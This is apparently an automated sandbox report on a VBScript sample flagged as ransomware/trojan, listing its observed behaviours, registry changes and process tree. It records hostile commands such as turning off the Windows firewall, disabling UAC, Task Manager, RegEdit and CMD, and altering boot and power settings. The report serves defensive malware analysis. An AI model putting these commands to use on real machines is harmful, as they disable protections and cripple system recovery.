48db7f40db76b3820b5c47d30f4cb99b79e755cbf61dddd6f2012f26eea52c9a

Analysis

max time kernel
284s
max time network
279s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
19-05-2024 15:20

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

malware.vbs
Size

5KB
MD5

97b26482ceb60d0f7cddfc0ca528f9ef
SHA1

0aa4343f9a757f864d617279fa4766b0a38ce72f
SHA256

48db7f40db76b3820b5c47d30f4cb99b79e755cbf61dddd6f2012f26eea52c9a
SHA512

5d1a5ee7ea521ceff427c402527bfba365579e25892a029d0d9ed77fe4b22c453c18fe48e24d275e090c00d2efb2e0adcf753e1658b2c061de61ea52b43c1af0
SSDEEP

96:qD5YNb8mN8r9f4PPfMSHnx2gqoij8RW8E/zmdPzWdEKuWP2W9NukS/MNa:qD5YqrZgX7yrCdPidfbU0a

Score

10^/10

discovery evasion execution exploit persistence ransomware trojan

Malware Config

Signatures

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid process

2584 bcdedit.exe
1864 bcdedit.exe
1156 bcdedit.exe
1440 bcdedit.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

pid	process
2584	bcdedit.exe
1864	bcdedit.exe
1156	bcdedit.exe
1440	bcdedit.exe

Disables RegEdit via registry modification 1 IoCs

evasion

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

700 netsh.exe
2460 netsh.exe
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exe

pid process

2412 takeown.exe
3132 icacls.exe
4364 takeown.exe
1436 icacls.exe
2360 takeown.exe
2184 icacls.exe
2556 takeown.exe
2088 icacls.exe
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exe

pid process

2184 icacls.exe
2556 takeown.exe
2088 icacls.exe
2412 takeown.exe
3132 icacls.exe
4364 takeown.exe
1436 icacls.exe
2360 takeown.exe

pid	process
700	netsh.exe
2460	netsh.exe

pid	process
2412	takeown.exe
3132	icacls.exe
4364	takeown.exe
1436	icacls.exe
2360	takeown.exe
2184	icacls.exe
2556	takeown.exe
2088	icacls.exe

pid	process
2184	icacls.exe
2556	takeown.exe
2088	icacls.exe
2412	takeown.exe
3132	icacls.exe
4364	takeown.exe
1436	icacls.exe
2360	takeown.exe

Drops file in System32 directory 19 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db	OpenWith.exe

Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exe

pid process

1352 sc.exe
2060 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1352	sc.exe
2060	sc.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exemsedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeipconfig.exe

pid process

4616 ipconfig.exe
3600 ipconfig.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2932 taskkill.exe
2192 taskkill.exe

pid	process
4616	ipconfig.exe
3600	ipconfig.exe

pid	process
2932	taskkill.exe
2192	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

LogonUI.exereg.exereg.exeOpenWith.execmd.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exeOpenWith.exereg.exeOpenWith.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@C:\Windows\System32\ieframe.dll,-55175 = "Internet Explorer"	OpenWith.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	cmd.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309dac0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	cmd.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\International\sLanguage = "rus"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoExplorer = "1"	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	cmd.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	cmd.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\en-US = "0c09"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	cmd.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E44E9428-BDBC-4987-A099-40DC8FD255E7} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF = 0100000000000000d67b69c000aada01	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\International	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System	reg.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{4234D49B-0245-4DF3-B780-3893943456E1} {000214E6-0000-0000-C000-000000000046} 0xFFFF = 01000000000000008bf97dc100aada01	OpenWith.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System	reg.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	OpenWith.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache	reg.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	OpenWith.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@C:\Windows\System32\ieframe.dll,-55175 = "Internet Explorer"	OpenWith.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	cmd.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	OpenWith.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableCMD = "2"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	OpenWith.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "221"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System	reg.exe

Modifies registry class 2 IoCs

Processes:

msedge.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{B7308E23-BF31-4212-BB8A-CA5B11D9C512}	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{41B39822-E41D-43EC-9C0D-4B7162BC9910}	msedge.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

taskmgr.exe

pid process

2168 taskmgr.exe
2168 taskmgr.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

msedge.exe

pid process

3276 msedge.exe
3276 msedge.exe
3276 msedge.exe

pid	process
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

Processes:

7zG.exetaskmgr.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetaskkill.exewhoami.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exetakeown.exetakeown.exeshutdown.exe

description	pid	process
Token: SeRestorePrivilege	4896	7zG.exe
Token: 35	4896	7zG.exe
Token: SeDebugPrivilege	2168	taskmgr.exe
Token: SeSystemProfilePrivilege	2168	taskmgr.exe
Token: SeCreateGlobalPrivilege	2168	taskmgr.exe
Token: 33	2168	taskmgr.exe
Token: SeIncBasePriorityPrivilege	2168	taskmgr.exe
Token: SeShutdownPrivilege	3224	powercfg.exe
Token: SeCreatePagefilePrivilege	3224	powercfg.exe
Token: SeShutdownPrivilege	3696	powercfg.exe
Token: SeCreatePagefilePrivilege	3696	powercfg.exe
Token: SeShutdownPrivilege	2904	powercfg.exe
Token: SeCreatePagefilePrivilege	2904	powercfg.exe
Token: SeShutdownPrivilege	1248	powercfg.exe
Token: SeCreatePagefilePrivilege	1248	powercfg.exe
Token: SeDebugPrivilege	2192	taskkill.exe
Token: SeDebugPrivilege	1648	whoami.exe
Token: SeTakeOwnershipPrivilege	2556	takeown.exe
Token: SeShutdownPrivilege	1440	powercfg.exe
Token: SeCreatePagefilePrivilege	1440	powercfg.exe
Token: SeShutdownPrivilege	1156	powercfg.exe
Token: SeCreatePagefilePrivilege	1156	powercfg.exe
Token: SeShutdownPrivilege	2248	powercfg.exe
Token: SeCreatePagefilePrivilege	2248	powercfg.exe
Token: SeShutdownPrivilege	496	powercfg.exe
Token: SeCreatePagefilePrivilege	496	powercfg.exe
Token: SeDebugPrivilege	3304	whoami.exe
Token: SeTakeOwnershipPrivilege	2412	takeown.exe
Token: SeTakeOwnershipPrivilege	4364	takeown.exe
Token: SeTakeOwnershipPrivilege	2360	takeown.exe
Token: SeShutdownPrivilege	3396	shutdown.exe
Token: SeRemoteShutdownPrivilege	3396	shutdown.exe

Suspicious use of FindShellTrayWindow 53 IoCs

Processes:

taskmgr.exemsedge.exe

pid	process
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe

Suspicious use of SendNotifyMessage 51 IoCs

Processes:

taskmgr.exemsedge.exe

pid	process
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
2168	taskmgr.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe
3276	msedge.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exeLogonUI.exe

pid process

4004 OpenWith.exe
3088 OpenWith.exe
832 OpenWith.exe
4460 LogonUI.exe

pid	process
4004	OpenWith.exe
3088	OpenWith.exe
832	OpenWith.exe
4460	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exenet.exe

description	pid	process	target process
PID 1408 wrote to memory of 2932	1408	cmd.exe	taskkill.exe
PID 1408 wrote to memory of 2932	1408	cmd.exe	taskkill.exe
PID 3660 wrote to memory of 3816	3660	cmd.exe	net.exe
PID 3660 wrote to memory of 3816	3660	cmd.exe	net.exe
PID 3816 wrote to memory of 2372	3816	net.exe	net1.exe
PID 3816 wrote to memory of 2372	3816	net.exe	net1.exe
PID 3660 wrote to memory of 3224	3660	cmd.exe	powercfg.exe
PID 3660 wrote to memory of 3224	3660	cmd.exe	powercfg.exe
PID 3660 wrote to memory of 3696	3660	cmd.exe	powercfg.exe
PID 3660 wrote to memory of 3696	3660	cmd.exe	powercfg.exe
PID 3660 wrote to memory of 2904	3660	cmd.exe	powercfg.exe
PID 3660 wrote to memory of 2904	3660	cmd.exe	powercfg.exe
PID 3660 wrote to memory of 1248	3660	cmd.exe	powercfg.exe
PID 3660 wrote to memory of 1248	3660	cmd.exe	powercfg.exe
PID 3660 wrote to memory of 2460	3660	cmd.exe	netsh.exe
PID 3660 wrote to memory of 2460	3660	cmd.exe	netsh.exe
PID 1408 wrote to memory of 2192	1408	cmd.exe	taskkill.exe
PID 1408 wrote to memory of 2192	1408	cmd.exe	taskkill.exe
PID 3660 wrote to memory of 4460	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4460	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4280	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4280	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 2964	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 2964	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 5080	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 5080	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 2412	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 2412	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4300	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4300	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 2120	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 2120	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 2204	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 2204	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 2556	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 2556	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 1544	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 1544	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 3852	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 3852	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 2376	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 2376	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 548	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 548	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4988	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4988	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4400	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4400	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 1348	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 1348	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4416	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4416	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 3892	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 3892	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4928	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4928	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4420	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4420	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 2652	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 2652	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4348	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 4348	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 2876	3660	cmd.exe	reg.exe
PID 3660 wrote to memory of 2876	3660	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"
1⤵
PID:1800

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1420 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
1⤵
PID:2584

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap18481:94:7zEvent10232 -ad -saa -- "C:\Users\Admin\AppData\Local\Temp\malware"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4896

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2168

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1408

C:\Windows\system32\taskkill.exe
taskkill -f -im
2⤵
- Kills process with taskkill
PID:2932

C:\Windows\system32\taskkill.exe
taskkill /f /im archive.bat
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\archive.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3660

C:\Windows\system32\net.exe
net session
2⤵
- Suspicious use of WriteProcessMemory
PID:3816

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:2372

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3224

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3696

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2904

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1248

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:2460

